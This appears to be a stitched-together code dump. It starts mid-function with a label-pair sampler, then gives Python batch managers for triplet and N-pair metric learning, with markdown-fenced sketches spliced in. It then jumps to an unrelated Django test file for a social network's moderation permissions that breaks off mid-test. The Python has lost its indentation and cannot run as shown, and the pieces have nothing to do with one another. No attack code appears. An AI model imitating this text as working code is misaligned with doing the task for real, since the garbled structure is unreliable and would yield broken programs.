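    candidates = [i for i, y in enumerate(labels)
                  if (y == anchor_label) == positive and i != anchor_idx]
    return random.choice(candidates)

labels = [0, 0, 1, 1]
assert sample_pair(labels, 0, True) == 1           # only same-class partner
assert labels[sample_pair(labels, 0, False)] == 1  # any different-class one
```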
class TripletDatamanager(object):
def __init__(self, image, label, nclass, nsclass=2):
'''
Args:
image -
label -
nclass - number of total classes
nsclass - When we select the batch, the number of classes it contain
'''
self.image = image
self.label = label
self.nclass = nclass
self.nsclass = nsclass
self.ndata = len(self.label)
# list with [self.nclass] each element = idx set of which label is cls_idx
# initialize
self.label_idx_set = list()
for cls_idx in range(self.nclass):
self.label_idx_set.append(list())
# append
for d_idx in range(self.ndata):
self.label_idx_set[self.label[d_idx]].append(d_idx)
# to numpy
for cls_idx in range(self.nclass):
self.label_idx_set[cls_idx] = np.array(self.label_idx_set[cls_idx])
self.valid_class_set = [cls_idx for cls_idx in range(self.nclass) if len(self.label_idx_set[cls_idx])>1]
self.ndata_idx = np.array([len(v) for v in self.label_idx_set])
self.fullidx = [np.arange(self.ndata_idx[cls_idx], dtype=np.int32) for cls_idx in range(self.nclass)]
self.start = np.zeros(self.nclass, dtype=np.int32)
self.end = np.zeros(self.nclass, dtype=np.int32)
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
for i in range(self.ndata):
            counter[int(self.label[i])] += 1
return counter
def change_nsclass(self, value):
self.nsclass = value
def next_batch(self, batch_size):
        '''
        Make a batch containing (batch_size // nsclass) samples from each of nsclass classes.
        Args:
            batch_size - int, total number of samples to return
        Return:
            image - batch_size images
            label - batch_size labels
        '''
        assert batch_size % self.nsclass == 0, "batch_size (%d) should be divisible by nsclass (%d)" % (batch_size, self.nsclass)
batch_per_class = batch_size//self.nsclass
for index in self.valid_class_set:
if self.start[index] == 0 and self.end[index] ==0:
np.random.shuffle(self.fullidx[index]) # shuffle first
sclass = np.array(random.sample(self.valid_class_set, self.nsclass))
self.subidx = list()
for cls_idx in sclass:
if self.end[cls_idx] + batch_per_class > self.ndata_idx[cls_idx]:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] = (self.end[cls_idx] + batch_per_class)%self.ndata_idx[cls_idx]
self.subidx.append(self.label_idx_set[cls_idx][
np.append(
self.fullidx[cls_idx][self.start[cls_idx]:self.ndata_idx[cls_idx]],\
self.fullidx[cls_idx][0:self.end[cls_idx]])])
self.start[cls_idx] = 0
self.end[cls_idx] = 0
else:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] += batch_per_class
self.subidx.append(self.label_idx_set[cls_idx][self.fullidx[cls_idx][self.start[cls_idx]:self.end[cls_idx]]])
if self.end[cls_idx]==self.ndata_idx[cls_idx]:
self.start[cls_idx]=0
self.end[cls_idx]=0
self.subidx = np.concatenate(self.subidx, axis=0)
return self.image[self.subidx], self.label[self.subidx].astype('int32')
class NpairDatamanager(object):
def __init__(self, image, label, nclass, nsclass):
self.image = image
self.label = label
self.nclass = nclass
self.nsclass = nsclass
self.ndata = len(self.label)
        # list of length self.nclass; element cls_idx holds the indices of samples whose label is cls_idx
# initialize
self.label_idx_set = list()
for cls_idx in range(self.nclass):
self.label_idx_set.append(list())
# append
for d_idx in range(self.ndata):
self.label_idx_set[self.label[d_idx]].append(d_idx)
# to numpy
for cls_idx in range(self.nclass):
self.label_idx_set[cls_idx] = np.array(self.label_idx_set[cls_idx])
self.valid_class_set = [cls_idx for cls_idx in range(self.nclass) if len(self.label_idx_set[cls_idx])>1]
self.ndata_idx = np.array([len(vlist) for vlist in self.label_idx_set])
self.fullidx = [np.arange(self.ndata_idx[index], dtype=np.int32) for index in range(self.nclass)]
self.start = np.zeros(self.nclass, dtype=np.int32)
self.end = np.zeros(self.nclass, dtype=np.int32)
def print_shape(self):
print("Image shape : {}".format(self.image.shape))
print("Label shape : {}".format(self.label.shape))
def count_label(self):
counter = np.zeros(self.nclass)
        for i in range(self.ndata):
            counter[int(self.label[i])] += 1
return counter
def next_batch(self, batch_size):
        '''
        Args:
            batch_size - int, total number of anchor and positive samples to return
        Return:
            anc_img - anchor images
            pos_img - positive images
            anc_label - labels of the anchor images
            pos_label - labels of the positive images
            anc_label and pos_label are identical; both are returned just for checking
        '''
        assert batch_size % (2 * self.nsclass) == 0, "batch_size (%d) should be a multiple of 2*nsclass (%d)" % (batch_size, 2 * self.nsclass)
batch_per_class = batch_size//self.nsclass
for index in self.valid_class_set:
if self.start[index] == 0 and self.end[index] ==0:
np.random.shuffle(self.fullidx[index]) # shuffle first
sclass = np.array(random.sample(self.valid_class_set, self.nsclass))
self.subidx = list()
for cls_idx in sclass:
if self.end[cls_idx] + batch_per_class > self.ndata_idx[cls_idx]:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] = (self.end[cls_idx] + batch_per_class)%self.ndata_idx[cls_idx]
self.subidx.append(self.label_idx_set[cls_idx][
np.append(
self.fullidx[cls_idx][self.start[cls_idx]:self.ndata_idx[cls_idx]],\
self.fullidx[cls_idx][0:self.end[cls_idx]])])
self.start[cls_idx] = 0
self.end[cls_idx] = 0
else:
self.start[cls_idx] = self.end[cls_idx]
self.end[cls_idx] += batch_per_class
self.subidx.append(self.label_idx_set[cls_idx][self.fullidx[cls_idx][self.start[cls_idx]:self.end[cls_idx]]])
if self.end[cls_idx]==self.ndata_idx[cls_idx]:
self.start[cls_idx]=0
self.end[cls_idx]=0
self.anc_subidx = np.concatenate([[v[idx] for idx in range(len(v)) if idx%2==0] for v in self.subidx], axis=0)
self.pos_subidx = np.concatenate([[v[idx] for idx in range(len(v)) if idx%2==1] for v in self.subidx], axis=0)
        assert len(self.anc_subidx) == len(self.pos_subidx), "anc and pos must have the same length"
return self.image[self.anc_subidx],\
self.image[self.pos_subidx],\
self.label[self.anc_subidx].astype('int32'),\
self.label[self.pos_subidx].astype('int32')
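# The two comprehensions above deinterleave each class's index run: even
# positions become anchors, odd positions become positives. The same split,
# sketched with hypothetical names and idiomatic NumPy striding:

```python
import numpy as np

def split_anchor_positive(per_class_indices):
    """Deinterleave each class's index array: even positions become anchors,
    odd positions become positives (each array has even length, as enforced
    by the batch_size % (2 * nsclass) == 0 assertion)."""
    anchors = np.concatenate([v[0::2] for v in per_class_indices])
    positives = np.concatenate([v[1::2] for v in per_class_indices])
    return anchors, positives

a, p = split_anchor_positive([np.array([10, 11, 12, 13]), np.array([20, 21])])
# a -> [10, 12, 20], p -> [11, 13, 21]
```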
DATAMANAGER_DICT = {
'basic' : BasicDatamanager,
'contrast' : ContrastDatamanager,
'triplet' : TripletDatamanager,
'npair' : NpairDatamanager
}
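# All three managers above share one cursor scheme: a permutation shuffled at
# the start of each epoch, with a wrap-around batch that splices the epoch's
# tail onto its head when a batch would overrun. A self-contained sketch of
# that scheme; the generator and its names are illustrative, not this module's API:

```python
import numpy as np

def circular_batches(n_items, batch_size, seed=0):
    """Yield index batches that walk a shuffled permutation, splicing the tail
    of the current epoch onto its head when a batch would overrun, then
    reshuffling for the next epoch (mirrors the start/end cursor logic)."""
    rng = np.random.default_rng(seed)
    start = 0
    while True:
        if start == 0:
            order = rng.permutation(n_items)  # reshuffle at each epoch start
        end = start + batch_size
        if end > n_items:
            # overrun: finish this epoch's tail, borrow from its head
            yield np.concatenate([order[start:], order[:end - n_items]])
            start = 0
        else:
            yield order[start:end]
            start = end % n_items  # end == n_items also resets the epoch
```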
# openbook_moderation/tests/views/moderated_object.py
# (TamaraAbells/okuna-api, MIT license)
import json
import tempfile
from PIL import Image
from django.core.files import File
from django.urls import reverse
from django.utils import timezone
from faker import Faker
from rest_framework import status
from openbook_common.tests.models import OpenbookAPITestCase
from openbook_auth.models import User
from openbook_common.tests.helpers import make_global_moderator, make_user, make_moderation_category, \
make_authentication_headers_for_user, make_moderated_object_description, \
make_community, make_fake_post_text, make_fake_post_comment_text, make_moderated_object, make_moderated_object_log, \
make_moderated_object_report, make_reactions_emoji_group, make_emoji, make_circle
from openbook_common.utils.model_loaders import get_user_new_post_notification_model, \
get_community_new_post_notification_model, get_post_comment_notification_model, \
get_post_comment_reaction_notification_model, get_post_comment_reply_notification_model, \
get_post_comment_user_mention_notification_model, get_post_comment_user_mention_model, \
get_post_reaction_notification_model, get_post_user_mention_model, get_post_user_mention_notification_model, \
get_community_invite_notification_model, get_follow_notification_model, get_connection_request_notification_model, \
get_connection_confirmed_notification_model
from openbook_communities.models import Community
from openbook_moderation.models import ModeratedObject, ModeratedObjectDescriptionChangedLog, \
ModeratedObjectCategoryChangedLog, ModerationPenalty, ModerationCategory, ModeratedObjectStatusChangedLog, \
ModeratedObjectVerifiedChangedLog
from openbook_posts.models import Post, PostComment
fake = Faker()
class ModeratedObjectAPITests(OpenbookAPITestCase):
"""
ModeratedObjectAPI
"""
def test_can_update_user_moderated_object_if_global_moderator(self):
"""
should be able to update a user moderated object if global moderator
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_can_update_user_moderated_object_if_approved(self):
"""
should be able to update a user moderated object if approved
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_can_update_user_moderated_object_if_rejected(self):
"""
should be able to update a user moderated object if rejected
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_cant_update_moderated_object_if_verified(self):
"""
should not be able to update a user moderated object if already verified
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
global_moderator.approve_moderated_object_with_id(moderated_object_id=moderated_object.pk)
global_moderator.verify_moderated_object_with_id(moderated_object_id=moderated_object.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertTrue(ModeratedObject.objects.filter(
category_id=report_category.pk,
description__isnull=True,
object_id=user.pk,
).exists())
def test_cant_update_user_moderated_object_if_not_global_moderator(self):
"""
should not be able to update a user moderated object if not a global moderator
"""
non_global_moderator = make_user()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_cant_update_user_moderated_object_if_community_moderator(self):
"""
should not be able to update a user moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
user = make_user()
user.join_community_with_name(community_name=community.name)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=user.pk,
).exists())
def test_creates_description_changed_log_on_update(self):
"""
should create a description changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectDescriptionChangedLog.objects.filter(
changed_from__isnull=True,
changed_to=new_moderated_object_description,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_creates_category_changed_log_on_update(self):
"""
should create a category changed log on update
"""
global_moderator = make_global_moderator()
user = make_user()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_user_with_username(username=user.username, category_id=report_category.pk)
new_moderated_object_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_user(user=user,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'category_id': new_moderated_object_category.pk,
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, ModeratedObjectCategoryChangedLog.objects.filter(
changed_from=report_category,
changed_to=new_moderated_object_category,
log__actor_id=global_moderator.pk,
log__moderated_object__object_id=user.pk
).count())
def test_can_update_community_moderated_object_if_global_moderator(self):
"""
should be able to update a community moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_community_with_name(community_name=community.name, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_cant_update_community_moderated_object_if_not_global_moderator(self):
"""
should not be able to update a community moderated object if not a global moderator
"""
non_global_moderator = make_user()
community = make_community()
report_category = make_moderation_category()
non_global_moderator.report_community_with_name(community_name=community.name,
category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_cant_update_community_moderated_object_if_community_moderator(self):
"""
should not be able to update a community moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(
username=community_moderator.username,
community_name=community.name)
user = make_user()
user.join_community_with_name(community_name=community.name)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_community_with_name(community_name=community.name,
category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_community(community=community,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=community.pk,
).exists())
def test_can_update_community_post_moderated_object_if_global_moderator(self):
"""
should be able to update a community post moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_can_update_community_post_moderated_object_if_community_moderator(self):
"""
should be able to update a community post moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_cant_update_community_post_moderated_object_if_not_global_nor_community_moderator(self):
"""
should not be able to update a community post moderated object if not global nor community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
non_moderator = make_user()
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_verified(self):
"""
community moderator should not be able to update a community post moderated object if already verified
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_approved(self):
"""
community moderator should not be able to update a community post moderated object if status is approved
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
community_moderator.approve_moderated_object_with_id(moderated_object_id=moderated_object.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_community_moderator_cant_update_community_post_moderated_object_if_rejected(self):
"""
community moderator should not be able to update a community post moderated object if status is rejected
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_creator = make_user()
post_creator.join_community_with_name(community_name=community.name)
post = post_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_post(post=post, category_id=report_category.pk)
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post(post=post,
category_id=report_category.pk)
community_moderator.reject_moderated_object_with_id(moderated_object_id=moderated_object.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post.pk,
).exists())
def test_can_update_community_post_comment_moderated_object_if_global_moderator(self):
"""
should be able to update a community post_comment moderated object if global moderator
"""
global_moderator = make_global_moderator()
community = make_community()
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_can_update_community_post_comment_moderated_object_if_community_moderator(self):
"""
should be able to update a community post_comment moderated object if community moderator
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(username=community_moderator.username,
community_name=community.name)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_cant_update_community_post_comment_moderated_object_if_not_global_nor_community_moderator(self):
"""
should not be able to update a community post_comment moderated object if neither a global nor a community moderator
"""
non_global_moderator = make_user()
community = make_community()
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(text=make_fake_post_text(), community_name=community.name)
post_comment = post_comment_creator.comment_post(text=make_fake_post_comment_text(),
post=post)
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(non_global_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_verified(self):
"""
community moderator should not be able to update a community post_comment moderated object if already verified
"""
global_moderator = make_global_moderator()
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
community_creator.add_moderator_with_username_to_community_with_name(community_name=community.name,
username=community_moderator.username)
post_comment_creator = make_user()
post_comment_creator.join_community_with_name(community_name=community.name)
post = post_comment_creator.create_community_post(community_name=community.name, text=make_fake_post_text())
post_comment = post_comment_creator.comment_post(post=post,
text=make_fake_post_comment_text())
reporter_user = make_user()
report_category = make_moderation_category()
reporter_user.report_comment_for_post(post=post, post_comment=post_comment, category_id=report_category.pk)
new_moderated_object_description = make_moderated_object_description()
new_report_category = make_moderation_category()
moderated_object = ModeratedObject.get_or_create_moderated_object_for_post_comment(post_comment=post_comment,
category_id=report_category.pk)
global_moderator.reject_moderated_object(moderated_object=moderated_object)
global_moderator.verify_moderated_object(moderated_object=moderated_object)
url = self._get_url(moderated_object=moderated_object)
headers = make_authentication_headers_for_user(community_moderator)
response = self.client.patch(url, data={
'description': new_moderated_object_description,
'category_id': new_report_category.pk
}, **headers)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertFalse(ModeratedObject.objects.filter(
category_id=new_report_category.pk,
description=new_moderated_object_description,
object_id=post_comment.pk,
).exists())
def test_community_moderator_cant_update_community_post_comment_moderated_object_if_approved(self):
"""
community moderator should not be able to update a community post_comment moderated object if status is approved
"""
community_creator = make_user()
community = make_community(creator=community_creator)
community_moderator = make_user()
community_moderator.join_community_with_name(community_name=community.name)
